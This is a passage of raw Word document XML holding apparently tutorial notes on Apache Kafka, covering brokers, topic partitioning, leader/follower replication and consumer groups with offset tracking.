          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF5857"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erves data to </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCCF2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Manages </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication and leadership</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for fault tolerance and high availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F040B4C"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4CC3E">
          <v:rect id="_x0000_i3360" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79322D4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Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15013393"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topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka is a logical stream of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A245C40"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manages </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata and storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3F8E4"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topic is divided into partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and partitions are spread across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9FFD0D"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C1EB8">
          <v:rect id="_x0000_i3361" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB945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Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037C047"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llow Kafka to scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D82D60"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partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hosted on one broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the leader), while others replicate it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41517D96"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Broker handles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4BC8CB"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ad/write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for partitions where it is the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6303C3"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from other brokers where it is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D943EF6"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35B87">
          <v:rect id="_x0000_i3362" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40253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essage Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1154F"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via replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB5F7A"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has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A94C0"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replica</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (handles all I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387963E4"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xml:space="preserve"> (synchronize with the leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F9E903"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Brokers </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>coordinate replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring data is safely stored across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CE0FF"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B05FD">
          <v:rect id="_x0000_i3363" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00665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5342"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4E61527B" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1363BB74"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pect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="741B177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roker’s Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5EDF7A75" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06A60F8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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BAE7587"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nages topic metadata and partition assignments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="47CF0ECD" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E69C01B"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79FBB155"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data, performs leader/follower duties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="74BC66B6" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D77B14D"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23D9C7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synchronization of partition data between brokers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="41AB4410" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABD5D3C"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s/Consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DAEB0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ts as interface for sending and receiving messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="625EECFB"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17A60">
          <v:rect id="_x0000_i3364" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB64AD9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626255B9"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n a Kafka cluster with 3 brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F93D0"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orders has 6 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46568B32"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 orders-0 could be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>led by Broker 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, with replicas on Broker 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126E817" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="00CE4B95" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Broker 1 manages all writes and reads for orders-0, and ensures data is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replicated</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Brokers 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2758C" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="00CE4B95"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3365" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD4134" w14:textId="26219333"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831" w:name="_Toc197868045"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka Consumer Group</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="831"/>
    </w:p>
    <w:p w14:paraId="07189F33" w14:textId="640EAD7A" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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fundamental concept in Apache Kafka that allows </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scaling and fault-tolerant consumption of messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0214C"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E9E63">
          <v:rect id="_x0000_i3366" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A3C2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Consumer Group?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67533C7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group of consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., Kafka clients) that </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>work together to consume data from a topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F43DB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w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads from a unique subset of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the topic, ensuring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hile avoiding duplicate consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E6C82"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BF015A">
          <v:rect id="_x0000_i3367" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A5A52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ey Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD6830"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ach partition is consumed by only one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the group at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1652DAEC"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ultiple consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can consume from the same topic </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if they belong to different consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A55AE4"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are tracked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 allowing independent consumption progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C976B"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394D1">
          <v:rect id="_x0000_i3368" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769E5B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y Use Consumer Groups?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EBBCF"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Distribute load across multiple consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897A042"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Add more consumers to improve throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBD653"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If a consumer crashes, others in the group can take over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189F9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0D577">
          <v:rect id="_x0000_i3369" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536A5E8"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6C878467"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racks the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>last read offset</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each partition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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF5C6E"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commit offsets </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically or manually</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB9A8EC"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helps </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without data loss or duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92521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A1145">
          <v:rect id="_x0000_i3370" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63BC21"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1C3529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we have a topic orders with 3 partitions: orders-0, orders-1, orders-2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80936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57C7EB1F" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A490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551A22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754007B1" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B93DC7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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627D1FF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2343AAE0" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3473FD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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D695F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BBF51F6" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75FF292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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DB2FA2"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B82AB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C2 fails,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orders-1 to another active consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BEBD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55224">
          <v:rect id="_x0000_i3371" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA2D7B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508"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="3C77B18A" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
